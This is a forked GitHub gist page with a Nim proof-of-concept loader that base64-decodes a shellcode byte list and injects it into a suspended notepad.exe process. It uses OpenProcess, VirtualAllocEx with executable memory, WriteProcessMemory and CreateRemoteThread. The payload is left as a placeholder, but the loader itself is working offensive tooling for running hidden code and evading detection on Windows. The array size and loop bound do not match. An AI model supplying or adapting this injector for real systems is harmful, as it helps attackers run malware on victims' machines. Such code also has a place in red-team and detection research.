Skip to content

Instantly share code, notes, and snippets.

@pawnmuncher
Forked from mttaggart/nimterpreter.nim
Created October 2, 2021 14:47
Show Gist options
  • Save pawnmuncher/7a7b2edcc654be37a5a59f494ab93af9 to your computer and use it in GitHub Desktop.
Save pawnmuncher/7a7b2edcc654be37a5a59f494ab93af9 to your computer and use it in GitHub Desktop.
A simple PoC for obfuscating shellcode in Nim
# With special thanks to byt3bl33d3r for Offensive Nim!
import winim/lean
import osproc
import base64
import sequtils
import strutils
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
let tProcess = startProcess("notepad.exe")
tProcess.suspend() # That's handy!
defer: tProcess.close()
echo "[*] Target Process: ", tProcess.processID
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)
echo "[*] pHandle: ", pHandle
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""
let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
echo "[*] Running in x64 process"
var sc = "Base64 Encoded string of comma-separated bytes goes here"
var sc_seq = base64.decode(sc).split(",")
.map(proc (h: string): string = strip(h))
.map(parseHexInt)
var shellcode: array[200626, byte]
for s in 0..200261:
shellcode[s] = byte sc_seq[s]
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
injectCreateRemoteThread(shellcode)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment